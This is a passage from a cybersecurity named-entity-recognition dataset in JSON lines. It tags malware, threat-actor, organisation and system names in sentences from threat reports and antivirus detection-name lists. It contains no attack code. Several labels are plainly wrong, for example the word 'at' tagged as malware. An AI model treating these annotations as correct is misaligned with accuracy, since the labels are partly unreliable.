family.": [[97, 115]]}, "info": {"id": "cyner2_train_007507", "source": "cyner2_train"}} {"text": "Tofsee, also known as Gheg, is another botnet analyzed by CERT Polska.", "spans": {"MALWARE: Tofsee,": [[0, 7]], "MALWARE: Gheg,": [[22, 27]], "MALWARE: botnet": [[39, 45]], "ORGANIZATION: CERT Polska.": [[58, 70]]}, "info": {"id": "cyner2_train_007508", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.15616.H Trojan.Bibei.A6 Bibei.a Win.Trojan.Rootkit-3954 Trojan.Win32.NtRootKit.rigfr TrojWare.Win32.Olmarik.AWI Trojan.NtRootKit.12543 Bibei.a TR/Offend.69286423 Trojan.Zusy.D27F7 Trojan:WinNT/Bibei.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007511", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Propas.110663 Trojan.Heur.RP.EDD84E Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.AQD TROJ_PASSPRO.C Win.Trojan.Enfal-62 Trojan.PWS.Winlog TROJ_PASSPRO.C BehavesLike.Win32.Dropper.ch W32/Trojan.IWQS-9238 Trojan:Win32/Propas.A Trojan:Win32/Propas.A Trojan.Propas!M9i4NRQV2R8 W32/Propas.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007515", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Syph.B Backdoor/W32.Syph.361984 Backdoor.Syph Backdoor.W32.Syph.b!c Trojan/Syph.b Backdoor.Syph.B Backdoor.Trojan BKDR_SYPH.B Win.Trojan.Syph-2 Backdoor.Syph.B Backdoor.Win32.Syph.b Backdoor.Syph.B Trojan.Win32.Syph.bfjuy Backdoor.Win32.Syph.361984 Win32.Backdoor.Syph.cyqv Backdoor.Syph.B Backdoor.Win32.Syph.B BackDoor.Syph BKDR_SYPH.B W32/Risk.GBZV-6047 Backdoor/Syph.b BDS/Syph.b.Srv Trojan[Backdoor]/Win32.Syph Backdoor:Win32/Syph.B Backdoor.Win32.Syph.b Backdoor.Syphillis Backdoor.Syph.b Bck/Syphillis.1.18 Win32/Syph.B Backdoor.Syph!hEmUZuSaZVQ Win32/Backdoor.e16", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007517", "source": "cyner2_train"}} {"text": "From April 19-24, 2017, a politically-motivated, targeted 
campaign was carried out against numerous Israeli organizations.", "spans": {"THREAT_ACTOR: politically-motivated, targeted campaign": [[26, 66]], "ORGANIZATION: Israeli organizations.": [[100, 122]]}, "info": {"id": "cyner2_train_007518", "source": "cyner2_train"}} {"text": "Although this technique has been used before by other malware campaigns, it is still not a common strategy.", "spans": {}, "info": {"id": "cyner2_train_007519", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9692 TR/Brysay.A PWS:Win32/Enesbot.A Trojan-Downloader.MSIL.Banload", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007522", "source": "cyner2_train"}} {"text": "Yet I recently uncovered evidence that suggests it was the work of a well-known Chinese threat group.", "spans": {"THREAT_ACTOR: Chinese threat group.": [[80, 101]]}, "info": {"id": "cyner2_train_007524", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 Trojan.Win32.Farfli Backdoor:Win32/Dorbop.B!bit Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007525", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.AD.eqoszf TR/AD.PSLoader.kykon Trojan.Razy.D1F16C Win32/Powerless.F Trojan.Powerless! 
W32/Powerless.F!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007526", "source": "cyner2_train"}} {"text": "We have labelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at least 2013.", "spans": {"THREAT_ACTOR: threat group the Gamaredon Group": [[22, 54]], "THREAT_ACTOR: the Gamaredon Group": [[83, 102]]}, "info": {"id": "cyner2_train_007527", "source": "cyner2_train"}} {"text": "In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims various parts of the Saudi Government.", "spans": {"MALWARE: information stealer Trojan": [[45, 71]], "MALWARE: Word macro,": [[91, 102]], "ORGANIZATION: the Saudi Government.": [[151, 172]]}, "info": {"id": "cyner2_train_007529", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeMsHelpCenter.Trojan Trojan.Graftor.D67ED Win32.Trojan.WisdomEyes.16070401.9500.9997 TROJ_ALTHUMS_EI030112.UVPM Trojan.Win32.DownLoad2.rlsdn Trojan.Win32.A.Downloader.84626 Trojan.DownLoad2.63614 Trojan.Allthumbs.Win32.1 TROJ_ALTHUMS_EI030112.UVPM BehavesLike.Win32.Worm.tz Trojan:Win32/Althums.A Trojan/Win32.Goz.R10705 Trj/CI.A Trojan.Graftor!H+8m5ivUpKY Win32/Trojan.0be", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007531", "source": "cyner2_train"}} {"text": "A backdoor also known as: BKDR_MATSNU.SM0 Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_MATSNU.SM0 BehavesLike.Win32.Ransom.ch TR/Crypt.ZPACK.8577 Trojan/Win32.Trapwot.R152769 Trojan.FakeAV.01657", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007533", "source": "cyner2_train"}} {"text": "This finding was listed in our Anthem blog, and we have continued to monitor it in ThreatConnect since mid February.", "spans": {"ORGANIZATION: Anthem": [[31, 37]], "SYSTEM: ThreatConnect": [[83, 96]]}, "info": {"id": "cyner2_train_007535", "source": "cyner2_train"}} 
{"text": "A backdoor also known as: W32.JapiletAA.Trojan Trojan.Dropper.Delf.BB Worm.Win32.Fesber!O Worm.Fesber Worm.Fesber.Win32.3 Trojan/Fesber.a W32/Fesber.A Win32/Fesber.A WORM_YERO.A Win.Worm.Yero-1 Worm.Win32.Fesber.g Trojan.Dropper.Delf.BB Virus.Win32.Fesber.iiof Worm.Win32.A.Fesber.13116[UPX] Virus.Win32.Fesber.k Trojan.Dropper.Delf.BB Win32.HLLW.FSB WORM_YERO.A BehavesLike.Win32.Fesber.vh W32/Fesber.QPGQ-0002 Worm/Fesber.g Worm/Win32.Fesber.g Worm.Fesber.kcloud Worm:Win32/Fesber.A Trojan.Dropper.Delf.BB Troj.PSW32.W.QQPass.lgj2 Worm.Win32.Fesber.g Trojan.Dropper.Delf.BB Worm/Win32.Fesber.R4309 Trojan.Dropper.Delf.BB Virus.Fsb.1 I-Worm.Fesber.A Win32/Fesber.A Worm.Fesber!I2XPvd5yXYs Worm.Win32.Fesber W32/Cosmu.H.worm Worm.Win32.Fesber.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007536", "source": "cyner2_train"}} {"text": "What is special about it is that it comes as a Windows link file, .LNK, that downloads and runs a malicious HTML application, .HTA, that drops and executes a malicious binary.", "spans": {}, "info": {"id": "cyner2_train_007537", "source": "cyner2_train"}} {"text": "Our analysis of the Adobe Flash zero-day vulnerability used in the latest Pawn Storm campaign reveals that the previous mitigation techniques introduced by Adobe were not enough to secure the platform.", "spans": {"SYSTEM: Adobe Flash": [[20, 31]], "VULNERABILITY: zero-day vulnerability": [[32, 54]], "THREAT_ACTOR: Pawn Storm campaign": [[74, 93]], "ORGANIZATION: Adobe": [[156, 161]]}, "info": {"id": "cyner2_train_007540", "source": "cyner2_train"}} {"text": "The actors behind Dridex 220 and Locky Affid=3 have introduced a new ransomware called Bart", "spans": {"MALWARE: Dridex 220": [[18, 28]], "MALWARE: Locky Affid=3": [[33, 46]], "MALWARE: ransomware": [[69, 79]], "MALWARE: Bart": [[87, 91]]}, "info": {"id": "cyner2_train_007541", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Joke.Flipped.E Joke.Flipped 
Riskware.Win16.Flipped.yzsd Joke.Flipped JOKE_FLIPPED.A Joke.Flipped Application.Joke.Flipped.E Joke.Flipped Application.Joke.Flipped Joke.Flipped JOKE_FLIPPED.A Joke.Flipped Backdoor/IRC.IRC Joke:Win32/Flipped.A Trojan.Win32.A.Zbot.4128 Application.Joke.Flipped.E Joke.Flipped Joke.Flipped", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007542", "source": "cyner2_train"}} {"text": "Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows.", "spans": {"MALWARE: Komplex": [[0, 7]], "MALWARE: tool": [[77, 81]], "THREAT_ACTOR: Sofacy": [[90, 96], [124, 130]], "MALWARE: Carberp variant": [[103, 118]], "THREAT_ACTOR: attack campaigns": [[152, 168]], "SYSTEM: systems running Windows.": [[172, 196]]}, "info": {"id": "cyner2_train_007543", "source": "cyner2_train"}} {"text": "In 2014, our colleagues at Crowdstrike wrote an exposé about a long-standing Chinese APT threat group they self-named Putter Panda, which Mandiant/FireEye refers to as APT2.", "spans": {"ORGANIZATION: colleagues": [[13, 23]], "ORGANIZATION: Crowdstrike": [[27, 38]], "THREAT_ACTOR: Chinese APT threat group": [[77, 101]], "THREAT_ACTOR: Putter Panda,": [[118, 131]], "ORGANIZATION: Mandiant/FireEye": [[138, 154]], "THREAT_ACTOR: APT2.": [[168, 173]]}, "info": {"id": "cyner2_train_007545", "source": "cyner2_train"}} {"text": "Apache Tomcat is a java based web service that is used for different applications.", "spans": {"SYSTEM: Apache Tomcat": [[0, 13]], "SYSTEM: java": [[19, 23]], "SYSTEM: web service": [[30, 41]], "SYSTEM: different applications.": [[59, 82]]}, "info": {"id": "cyner2_train_007546", "source": "cyner2_train"}} {"text": "Among the 153 configuration files, 54 distinct command and control C C servers were detected.", "spans": {}, "info": {"id": "cyner2_train_007547", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojan.Win32.RedCap.ewfcku BehavesLike.Win32.VBobfus.gc Trojan.CopyKittens TR/RedCap.eevfy Trojan.Razy.D33AF6 TrojanDropper:Win32/Noratops.B!dha Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007548", "source": "cyner2_train"}} {"text": "According to a blog article by Microsoft, the malware is associated with an attacker group identified as DarkHotel Microsoft calls it as Dubnium .", "spans": {"ORGANIZATION: Microsoft,": [[31, 41]], "MALWARE: malware": [[46, 53]], "THREAT_ACTOR: attacker group": [[76, 90]], "THREAT_ACTOR: DarkHotel": [[105, 114]], "ORGANIZATION: Microsoft": [[115, 124]], "THREAT_ACTOR: Dubnium": [[137, 144]]}, "info": {"id": "cyner2_train_007549", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Lamer.KL8 PE_LAMER_EL150191.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9987 PE_LAMER_EL150191.UVPM Virus.Win32.Lamer.kl Virus.W32.Lamer!c ApplicUnsaf.Win32.ScreenMate.AA Backdoor.PePatch.Win32.75884 Virus.Win32.Lamer TR/Taranis.2787 Trojan[Ransom]/Win32.CryFile Virus.Win32.Lamer.kl Hoax.CryFile Virus.Win32.Lamer.j Win32/Virus.HideDoc.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007550", "source": "cyner2_train"}} {"text": "Google's security team recently identified a new domain masquerading as an official EFF site as part of a targeted malware campaign.", "spans": {"ORGANIZATION: Google's security team": [[0, 22]], "THREAT_ACTOR: malware campaign.": [[115, 132]]}, "info": {"id": "cyner2_train_007552", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameELAIUZAC.Trojan Trojan.Zusy.D3B59 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.Clicker.cwyjjr Trojan.Click2.34240 Win32.Troj.Undef.kcloud Trojan:MSIL/Ainscomp.A Trj/CI.A Trojan.Ainscomp!KTuN3cZslCo Trojan.Msil Win32/Trojan.bfc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007553", "source": "cyner2_train"}} {"text": "The three InPage exploit files are linked 
through their use of very similar shellcode, which suggests that either the same actor is behind these attacks, or the attackers have access to a shared builder.", "spans": {"MALWARE: InPage exploit": [[10, 24]], "THREAT_ACTOR: the same actor": [[114, 128]], "THREAT_ACTOR: the attackers": [[157, 170]]}, "info": {"id": "cyner2_train_007557", "source": "cyner2_train"}} {"text": "A new type of macOS-based stealer is being sold on the dark web for $100 £70.", "spans": {"MALWARE: macOS-based stealer": [[14, 33]]}, "info": {"id": "cyner2_train_007558", "source": "cyner2_train"}} {"text": "The emails sent by this campaign may look spartan to the professional eye but, as ever, the human point of interaction with systems is the most vulnerable: by potentially reaching so many individuals, campaigns such as this can - and do - succeed in infecting people.", "spans": {"THREAT_ACTOR: campaign": [[24, 32]], "SYSTEM: systems": [[124, 131]], "VULNERABILITY: vulnerable:": [[144, 155]], "ORGANIZATION: individuals,": [[188, 200]], "THREAT_ACTOR: campaigns": [[201, 210]]}, "info": {"id": "cyner2_train_007561", "source": "cyner2_train"}} {"text": "Most custom backdoors used by advanced attackers have limited functionality.", "spans": {"MALWARE: custom backdoors": [[5, 21]], "THREAT_ACTOR: advanced attackers": [[30, 48]]}, "info": {"id": "cyner2_train_007563", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Bifrose.nel Win.Trojan.AutoIT-6333854-0 Trojan-Dropper.Win32.Autoit.bvg Trojan.Win32.AutoIt.expdpu BehavesLike.Win32.Backdoor.tc Trojan.Win32.Z.Autoit.1633763 Dropper/Win32.Androm.C2387785 Win32/Injector.Autoit.DFJ Backdoor.MSIL W32/Injector.CYH!tr Win32/Trojan.38f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007567", "source": "cyner2_train"}} {"text": "Over the past couple of months McAfee Labs has seen an increase in the usage of macros to deliver malware.", "spans": {"ORGANIZATION: McAfee Labs": [[31, 42]], "MALWARE: macros": 
[[80, 86]], "MALWARE: malware.": [[98, 106]]}, "info": {"id": "cyner2_train_007571", "source": "cyner2_train"}} {"text": "We mostly observe attacks using Elirks occurring in East Asia.", "spans": {"MALWARE: Elirks": [[32, 38]]}, "info": {"id": "cyner2_train_007572", "source": "cyner2_train"}} {"text": "We observed an anomaly when approximately 60 domains all [.]top TLDs registered on April 7, 2016 started serving a coin mining malware – to mine BitMonero, a form of digital currency – on their main page under the mime-type of html/text.", "spans": {"MALWARE: coin mining malware": [[115, 134]]}, "info": {"id": "cyner2_train_007573", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.E147 Trojan.Banker.Win32.5895 Trojan/Banker.ju W32/Banker.AJC Win.Trojan.Bancos-852 Trojan-Banker.Win32.Banker.ju Trojan.Win32.Banker.bmncx Trojan.PWS.Banker.based Trojan-Spy.Win32.Banker W32/Banker.WTGS-4277 Trojan/Banker.Banker.ufm Trojan[Banker]/Win32.Banker Trojan-Banker.Win32.Banker.ju TrojanBanker.Banker Trojan.Banker!qguLAzH8AII W32/Banker.DUU!tr Trj/Banker.FWD Win32/Trojan.a46", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007574", "source": "cyner2_train"}} {"text": "At least two different stealers, Rhadamanthys and RedLine, were abusing the search engine promotion plan in order to deliver malicious payloads to victims' machines.", "spans": {"MALWARE: At": [[0, 2]], "MALWARE: stealers, Rhadamanthys": [[23, 45]], "MALWARE: RedLine,": [[50, 58]], "SYSTEM: the search engine": [[72, 89]], "MALWARE: malicious payloads": [[125, 143]], "SYSTEM: victims' machines.": [[147, 165]]}, "info": {"id": "cyner2_train_007575", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9925 Trojan.Win32.Graftor.bovqdb TrojWare.Win32.GameThief.Nilage.~CRSH TR/Graftor.Elzob.6117.1 Backdoor:Win32/Parcim.A Trj/CI.A Trojan.Graftor.Elzob.D17E5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_007576", "source": "cyner2_train"}} {"text": "It has been in the news the past few weeks as it is the bot that was used in the DDoS attack on Brian Kreb's security blog.", "spans": {"MALWARE: bot": [[56, 59]], "ORGANIZATION: Brian Kreb's security blog.": [[96, 123]]}, "info": {"id": "cyner2_train_007577", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Jevafus.A Trojan.Jevafus.A Trojan.Jevafus.A Trojan.Win32.Drop.euelge Trojan.Jevafus.A Trojan.Jevafus.A BehavesLike.Win32.BadFile.vh TrojanDropper:Win32/Jevafus.A Trojan.Jevafus.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007578", "source": "cyner2_train"}} {"text": "So far, all theories regarding the spread of ExPetr/Petya point into two directions:", "spans": {}, "info": {"id": "cyner2_train_007579", "source": "cyner2_train"}} {"text": "The CatB ransomware family, sometimes referred to as CatB99 or Baxtoy, was first observed in late 2022, with campaigns being observed steadily since November.", "spans": {"MALWARE: The CatB ransomware family,": [[0, 27]], "MALWARE: CatB99": [[53, 59]], "MALWARE: Baxtoy,": [[63, 70]], "THREAT_ACTOR: campaigns": [[109, 118]]}, "info": {"id": "cyner2_train_007581", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Svectas.Win64.1 Packer.Win32.Katusha TR/Svectas.smnlb W64/Svectas.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007582", "source": "cyner2_train"}} {"text": "PaloAltorecently discovered a new Android Trojan called SpyNote which facilitates remote spying.", "spans": {"THREAT_ACTOR: PaloAltorecently": [[0, 16]], "MALWARE: Android Trojan": [[34, 48]], "MALWARE: SpyNote": [[56, 63]]}, "info": {"id": "cyner2_train_007583", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.F81D Trojan.Mikhail.Win32.4 Trojan.Ransom.Mischa.2 Ransom_MISCHA.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom_MISCHA.SM Win32.Trojan-Ransom.Petya.D 
Trojan-Ransom.Win32.Mikhail.a Trojan.Win32.Petya.96256 Trojan.Encoder.4544 Trojan.Petr.a TR/AD.Petya.Y.rxxx Trojan[Ransom]/Win32.Mikhail Ransom:Win32/Mischa.A Trojan-Ransom.Win32.Mikhail.a Trojan/Win32.Mischa.C1478164 Hoax.Mikhail Trojan.Mikhail!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007584", "source": "cyner2_train"}} {"text": "A backdoor also known as: Doc.Exploit.DDEautoexec-6346603-0 Exploit.Xml.DDEAuto.euqmxe Trojan[Exploit]/MSOffice.DDE.c Win32.Outbreak", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007585", "source": "cyner2_train"}} {"text": "The end result is a new banking Trojan in the wild.", "spans": {"MALWARE: banking Trojan": [[24, 38]]}, "info": {"id": "cyner2_train_007587", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9899 HV_ROGUE_CG152C85.RDXN Heur.Packed.Unknown TR/Spy.Banker.45879 TrojanProxy:BAT/Banker.G Win32/RiskWare.PEMalform.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007588", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Proxy/W32.Steredir.504832 Trojan/Proxy.Steredir.c Trojan-Proxy.Win32.Steredir.c Trojan.Win32.Steredir.fqli Troj.Proxy.W32.Steredir.c!c TrojWare.Win32.TrojanProxy.Steredir.C Trojan.Stedir.11 Trojan.Steredir.Win32.7 Trojan-Dropper.Delf W32/Risk.RESM-4501 TrojanProxy.Steredir.c TR/Proxy.Steredir.C Trojan[Proxy]/Win32.Steredir Win32.Troj.Steredir.c.kcloud Trojan.Heur.EFD23B1 Trojan.Win32.Proxy.504832 Trojan-Proxy.Win32.Steredir.c TrojanProxy:Win32/Steredir.C Win32/TrojanProxy.Steredir.C Trojan.PR.Steredir!cYzY1isGQt0 W32/Steredir.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007589", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.gc Trojan.MSIL.Bladabindi.1 HackTool:MSIL/Injector.A Trojan.LVBP.ED Backdoor.Win32.DarkKomet", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007592", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Hupigon!O TrojanDropper.Dowque.A8 Backdoor.Hupigon.Win32.182 Backdoor/Hupigon.dkwt TROJ_DOWQUE.NY Win32.Trojan.Delf.b W32/Backdoor2.CWRX Backdoor.Graybird TROJ_DOWQUE.NY Win.Worm.Autorun-12451 Backdoor.Win32.Hupigon.56864 Backdoor.W32.Hupigon.l9fO BackDoor.Graybird.75 BehavesLike.Win32.SpywareLyndra.tc W32/Backdoor.DAWT-3367 Backdoor/Huigezi.2008.qny BDS/Farfli.kj.2 Win32.TrojDownloader.dl.kcloud TrojanDropper:Win32/Dowque.A Trojan/Win32.Hupigon.C29670 Backdoor.Bot Win32/Delf.NSN Backdoor.Win32.Hupigon.dkw Backdoor.Hupigon!hgCryiT987Y Backdoor.Win32.HacDef W32/Injector.fam!tr Trojan.Win32.Downloader.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007593", "source": "cyner2_train"}} {"text": "The file is named in such a way as to confuse WordPress administrators who are familiar with XML-RPC.", "spans": {"SYSTEM: WordPress administrators": [[46, 70]]}, "info": {"id": "cyner2_train_007594", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Win64.PSWDump.f BehavesLike.Win64.SoftPulse.lh HackTool.Mimikatz HackTool.Win64.PSWDump.f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007596", "source": "cyner2_train"}} {"text": "The story was about a new vulnerability for *nix-based systems – EternalRed aka SambaCry.", "spans": {"VULNERABILITY: new vulnerability": [[22, 39]], "SYSTEM: *nix-based systems": [[44, 62]], "MALWARE: EternalRed": [[65, 75]], "MALWARE: SambaCry.": [[80, 89]]}, "info": {"id": "cyner2_train_007597", "source": "cyner2_train"}} {"text": "There have been an emegerence of new domains for FighterPOS recently and I discovered a whole load of other possible domains that could be used for the command and control.", "spans": {"MALWARE: FighterPOS": [[49, 59]]}, "info": {"id": "cyner2_train_007599", "source": "cyner2_train"}} {"text": "The 
service connects back to the attacker machine and waits for commands which will be given by the attacker.", "spans": {"THREAT_ACTOR: attacker": [[33, 41]], "SYSTEM: machine": [[42, 49]], "THREAT_ACTOR: the attacker.": [[96, 109]]}, "info": {"id": "cyner2_train_007602", "source": "cyner2_train"}} {"text": "Crooks behind MajikPOS have various tricks up their sleeves.", "spans": {"THREAT_ACTOR: Crooks": [[0, 6]], "MALWARE: MajikPOS": [[14, 22]]}, "info": {"id": "cyner2_train_007603", "source": "cyner2_train"}} {"text": "TA473 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe.", "spans": {"THREAT_ACTOR: TA473": [[0, 5]], "VULNERABILITY: unpatched Zimbra vulnerability": [[36, 66]], "SYSTEM: publicly facing webmail": [[70, 93]], "SYSTEM: email mailboxes": [[141, 156]], "ORGANIZATION: government entities": [[160, 179]]}, "info": {"id": "cyner2_train_007604", "source": "cyner2_train"}} {"text": "Presumably from the same author of Petya, which was first seen in December 2016, and the Petya-Mischa combo, which hit users back in July 2016, Janus Cybercrime Solution's latest creation is another step in the evolution of their ransomware-as-a-service expansion.", "spans": {"THREAT_ACTOR: same author": [[20, 31]], "MALWARE: Petya,": [[35, 41]], "MALWARE: Petya-Mischa": [[89, 101]], "ORGANIZATION: users": [[119, 124]], "ORGANIZATION: Janus Cybercrime Solution's": [[144, 171]], "MALWARE: ransomware-as-a-service": [[230, 253]]}, "info": {"id": "cyner2_train_007606", "source": "cyner2_train"}} {"text": "Our research indicates that the group has sufficient financial resources to purchase the source code of a widely available malware tool, and the human resources to design improved versions of its own backdoors based on this.", "spans": {"ORGANIZATION: Our research": [[0, 12]], "MALWARE: malware tool,": [[123, 136]], "MALWARE: backdoors": [[200, 209]]}, 
"info": {"id": "cyner2_train_007607", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.JRQH Trojan.Downloader.JRQH Win32.Trojan.WisdomEyes.16070401.9500.9945 Win32.Trojan-Downloader.Banload.J Trojan-Downloader.MSIL.Banload.bgr Trojan.Downloader.JRQH Trojan.Win32.Banload.dzssxt Trojan.Downloader.JRQH Trojan.Downloader.JRQH Trojan-Downloader.MSIL.Banload.bgr TrojanDownloader:MSIL/Banload.T Trojan/Win32.Banload.C829219 Trojan.Banker.ABR Trj/GdSda.A Msil.Trojan-downloader.Banload.Efkz Trojan-Downloader.MSIL.Banload", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007608", "source": "cyner2_train"}} {"text": "Trigona ransomware is a relatively new strain that security researchers first discovered in late October 2022.", "spans": {"MALWARE: Trigona ransomware": [[0, 18]], "ORGANIZATION: security researchers": [[51, 71]]}, "info": {"id": "cyner2_train_007609", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.A537 Packed.Win32.TDSS!O RiskWare.Tool.CK BehavesLike.Win32.Downloader.dc TR/Bumat.A.2896 Win32.Troj.Undef.kcloud Win-Trojan/Xema.variant PE:Malware.XPACK-HIE/Heur!1.9C48 Trojan.Crypt W32/Malware_fam.NB Win32/Trojan.648", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007612", "source": "cyner2_train"}} {"text": "We observed legitimate exfiltrated files of the following types of data : Contact information Compressed recorded audio in the Adaptive Multi-Rate ( amr ) file format Images captured from the device camera Images stored on both internal device and SDCard storage that are listed in the MediaStore Device geolocation information SMS content Chrome browser search history and bookmarks Call log information Cell tower information Device network metadata ; such as phone number , device software version , network country , network operator , SIM country , SIM operator , SIM serial , IMSI , voice mail number , phone type , network type , data state , data 
activity , call state , SIM state , whether device is roaming , and if SMS is supported .", "spans": {}, "info": {"id": "cyner2_train_007613", "source": "cyner2_train"}} {"text": "This post describes the new campaign.", "spans": {"THREAT_ACTOR: the new campaign.": [[20, 37]]}, "info": {"id": "cyner2_train_007614", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.2431 Trojan.MSIL.FKV WS.Reputation.1 Stimilik.S Trojan.Win32.Confuser.dkqarl BehavesLike.Win32.Kudj.gc Trojan/Win32.Stealer PUA.MSIL.Confuser", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007615", "source": "cyner2_train"}} {"text": "Attackers also used the name of the top NIC official in the signature of the email, this is to make it look like the email was sent by a high ranking Government official working at NIC National Informatics Centre.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "ORGANIZATION: NIC official": [[40, 52]], "ORGANIZATION: Government": [[150, 160]], "ORGANIZATION: NIC National Informatics Centre.": [[181, 213]]}, "info": {"id": "cyner2_train_007616", "source": "cyner2_train"}} {"text": "PaloAlto observed a targeted attack in November directed at an individual working for the French Ministry of Foreign Affairs.", "spans": {"ORGANIZATION: PaloAlto": [[0, 8]], "MALWARE: at": [[57, 59]], "ORGANIZATION: individual": [[63, 73]], "ORGANIZATION: French Ministry of Foreign Affairs.": [[90, 125]]}, "info": {"id": "cyner2_train_007617", "source": "cyner2_train"}} {"text": "HMRC taxes application with reference L4TI 2A0A UWSV WASP received", "spans": {"ORGANIZATION: HMRC": [[0, 4]]}, "info": {"id": "cyner2_train_007619", "source": "cyner2_train"}} {"text": "The infection attempts occurred in September and October of 2015 as public frustration grew at the Mexican government's seemingly contradictory statements about the Narvarte case", "spans": {"MALWARE: infection": [[4, 13]], "MALWARE: at": [[92, 94]], "ORGANIZATION: the Mexican 
government's": [[95, 119]], "ORGANIZATION: the Narvarte case": [[161, 178]]}, "info": {"id": "cyner2_train_007620", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Mydoom.28864 W32.Mydoom.M W32/Mydoom.o@MM W32/Mydoom.m I-Worm.Mydoom!qBn5HU3v+Lw W32/Mydoom.O@mm W32.Mydoom.M@mm MyDoom.L@mm Win32/Mydoom.O Win32.Mydoom.m Worm.Mydoom-27 Email-Worm.Win32.Mydoom.m I-Worm.Win32.Mydoom.28864.A Email-Worm.Win32.Mydoom!IK Worm.Win32.Mydoom.R Win32.HLLM.MyDoom.54464 Worm/Mydoom.O.1 W32/Mydoom.o@MM Worm/Sramota.bef Worm/Win32.Mydoom Worm:Win32/Mydoom.O@mm W32/Mydoom.O@mm Win32/Mydoom.worm.49344.B Email-Worm.Win32.Mydoom.m Win32/Mydoom.R Worm.Mail.Mydoom.dh Email-Worm.Win32.Mydoom W32/Mydoom.M!dam I-Worm/Mydoom.O W32/Mydoom.N.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007621", "source": "cyner2_train"}} {"text": "The news organization provides reporting on its website in English, Georgian, and Russian.", "spans": {"ORGANIZATION: news organization": [[4, 21]]}, "info": {"id": "cyner2_train_007622", "source": "cyner2_train"}} {"text": "Mandiant suspects UNC2970 specifically targeted security researchers in this operation.", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: UNC2970": [[18, 25]], 